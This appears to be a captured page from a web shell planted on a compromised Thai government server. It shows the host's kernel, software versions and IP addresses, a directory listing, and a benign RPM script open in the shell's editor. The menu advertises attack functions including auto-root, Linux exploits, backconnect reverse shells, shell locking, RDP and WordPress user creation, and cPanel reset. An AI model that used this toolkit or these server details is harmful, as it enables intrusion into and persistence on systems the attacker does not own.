Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
rpm /
redhat /
[ HOME SHELL ]
Name
Size
Permission
Action
find-provides.d
[ DIR ]
drwxr-xr-x
brp-compress
1.42
KB
-rwxr-xr-x
brp-implant-ident-static
970
B
-rwxr-xr-x
brp-java-repack-jars
2.6
KB
-rwxr-xr-x
brp-python-hardlink
682
B
-rwxr-xr-x
brp-redhat
405
B
-rwxr-xr-x
brp-sparc64-linux
1.05
KB
-rwxr-xr-x
brp-strip
509
B
-rwxr-xr-x
brp-strip-comment-note
803
B
-rwxr-xr-x
brp-strip-shared
707
B
-rwxr-xr-x
brp-strip-static-archive
416
B
-rwxr-xr-x
config.guess
43.55
KB
-rwxr-xr-x
config.sub
31.96
KB
-rwxr-xr-x
dist.sh
1.92
KB
-rwxr-xr-x
find-provides
2.79
KB
-rwxr-xr-x
find-provides.ksyms
241
B
-rwxr-xr-x
find-provides.libtool
187
B
-rwxr-xr-x
find-provides.pkgconfig
603
B
-rwxr-xr-x
find-requires
4.05
KB
-rwxr-xr-x
find-requires.ksyms
4.44
KB
-rwxr-xr-x
find-requires.libtool
271
B
-rwxr-xr-x
find-requires.pkgconfig
257
B
-rwxr-xr-x
kmodtool
7.5
KB
-rwxr-xr-x
macros
8.66
KB
-rw-r--r--
perl.prov
4.73
KB
-rwxr-xr-x
perl.req
6.22
KB
-rwxr-xr-x
rpmrc
3.25
KB
-rw-r--r--
rpmsort
2.11
KB
-rwxr-xr-x
symset-table
903
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : symset-table
#! /bin/sh # Create a table of all symbol sets defined in all /boot/symsets*.tar.gz # files. # # Format: # kernelrelease/modver/symbol <tab> symset <tab> symset_hash # # This table is needed for computing the appropriate Requires: tags for # kernel module packages. tmpdir=$(mktemp -t -d ${0##*/}.XXXXXX) trap "cd / ; rm -rf $tmpdir" EXIT cd $tmpdir shopt -s nullglob for symsets in /boot/symsets-*.tar.gz; do zcat $symsets \ | tar xf - done for symsets in /usr/src/kernels/*/symsets-*.tar.gz; do zcat $symsets \ | tar xf - done for symsets in *; do krel=${symsets#symsets-} for symset in $symsets/*; do class=${symset##*/} ; class=${class%.*} hash=${symset##*.} awk ' BEGIN { FS = "\t" ; OFS = "\t" } { sub(/0x0*/, "", $1) print krel "/" $1 "/" $2, class, hash } ' krel="$krel" class="$class" hash="$hash" $symset done done # vim:shiftwidth=4 softtabstop=4
Close